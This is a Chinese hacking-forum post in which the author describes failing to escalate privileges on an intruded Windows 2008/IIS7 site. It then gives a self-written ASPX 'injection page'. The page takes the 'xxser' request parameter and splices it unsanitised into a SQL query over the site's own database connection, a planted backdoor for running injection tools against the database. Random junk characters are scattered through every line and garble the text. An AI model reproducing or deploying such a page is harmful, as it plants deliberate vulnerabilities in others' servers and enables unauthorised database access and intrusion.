昨天跟4z1看一个站点,提权很难提,看了整整5个小时,无果。 2008+iis7,无sa,无root,无各种服务。。。
( S5 q: V5 f( w% M0 d7 e+ a5 [其实中用到了aspx构造注射来跨站,网上找了一堆代码,没一个能用的。
W( h2 \2 e3 v% T代码量不多,自己写个拉倒了。烦死了。
( b2 g9 a3 s# }7 Y( c
6 C3 N d" c; c# m9 H* i$ \' t6 v
1 G4 P2 s/ a/ K% ^, p; U$ _<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
4 K1 ?% r( A: e' ^<html xmlns="http://www.w3.org/1999/xhtml">5 V8 K9 S" y$ ]0 ^+ {
<head runat="server">
* d/ j: r, c( k* F: x; A( D <title>暗影aspx构造注射专用页面</title>
/ V4 E2 j8 J, D* I1 {4 j</head>: ?( x6 T' A$ z0 e
<body>
+ S" r& \7 {. ?( K( g6 Q <form id="form1" runat="server">
# \1 P; i( e6 D4 p4 i$ }: \ <div>+ M/ u! _2 G, P6 t' r2 x* ~0 [
<script language="c#" runat="server">$ ~. r# Q" T- j: u+ Z+ f E
" d+ S+ t- T( R1 h& q9 U1 F) H void page_init(object sender, EventArgs e)2 m( c* _. [- t$ s! h% [
{
2 n# y8 t& i1 x0 y( v
2 z7 D7 @& T2 Z5 O3 M0 K System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();4 F+ @; O+ c) k& C
* F* U Y2 f- W u0 Y- m% Z2 Z5 `
conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();& H! H7 l7 h9 g: f6 {
conn.Open();
[! f% Y8 T( x$ n& i' @, p4 P) [
+ a8 e, G; D4 a4 U P/ x string i = this.Page.Request.Params["xxser"]; //这里是参数?xxser=1
+ Q& g$ a; J" o4 j6 g1 J; d: Q1 S
3 t/ |. A0 \ n0 B0 ~( P System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);6 e3 K0 K1 D4 L( S5 ^+ u! W2 M6 X
int x = command.ExecuteNonQuery();. R. J& F: z A! A. K. f1 y
Response.Write(i+"\n");# q; T. _0 ?: \; G
Response.Write(x);. _% ], F" K$ Z& t9 }4 {
conn.Close();
$ o, K' l) ]" F5 {9 f0 T }
4 O. s' ~* ?7 s3 Y! |8 C+ u# Z6 [
6 T N7 U7 I3 b </script>
+ q9 V- }; _/ L2 K0 F7 l v1 S </div>
4 O' A" _4 c! q* v+ B </form>* c+ ]8 W* Z2 i+ [: ~
</body>% R: F Z- `2 y$ u3 D
</html>
" X3 Q" @+ i- F8 I8 y |